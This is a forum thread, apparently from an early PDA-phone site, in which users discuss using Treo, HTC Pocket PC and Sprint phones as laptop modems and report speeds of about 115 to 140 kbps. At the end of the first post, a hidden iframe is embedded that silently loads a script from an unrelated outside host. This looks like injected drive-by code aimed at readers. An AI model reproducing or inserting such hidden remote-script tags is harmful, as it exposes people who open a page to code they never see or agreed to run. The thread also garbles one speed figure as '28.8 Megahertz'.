Can a Pdaphone (PocketPC based or Palm based) be used as a modem in conjunction with a laptop? If so, what are the data transfer rates? When I travel, my laptop goes with me. This may be reason enough for me to get a data plan when I change phones/service.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
For the HTC made Pocket PC Phones, the answer is no... the radio doesn't support it. For the Treo, there is an FAQ - Can I use the Treo as a wireless modem? that explains how to do this with some additional software. I don't know about the others... perhaps other folks can chime in. I know these are the two you are interested in anyway.
You should be aware that most Sprint Vision phones as well as some 2G wireless phones (Sprint) that have data capabilities can connect to the laptop/desktop as a wireless modem through a data cable. I have four phones that do this, two of which are PDA phones and all are Sprint phones. My current phones that I use this way is the Sanyo 4900 and the Samsung I330. The data speed is up to 115.2 kbps right now or equivilent to a 28.8 Megahertz modem. Its a lot quicker than the slow 14.4 modem.
As an update, the Samsung i700 can do this extremely well, and extremely fast. The HTC Pocket PC Phone Edition family is able to now do this with newer ROMS.
The Sprint data speed is typically running around 110k-140k, usually in the higher part of that range where I've tested it. This is a few times faster than a 28k modem, obviously. If your serial port can only run at 115k, then that would be your limit and you'd gain nothing from compression. With a high speed serial, you could increase your speed.
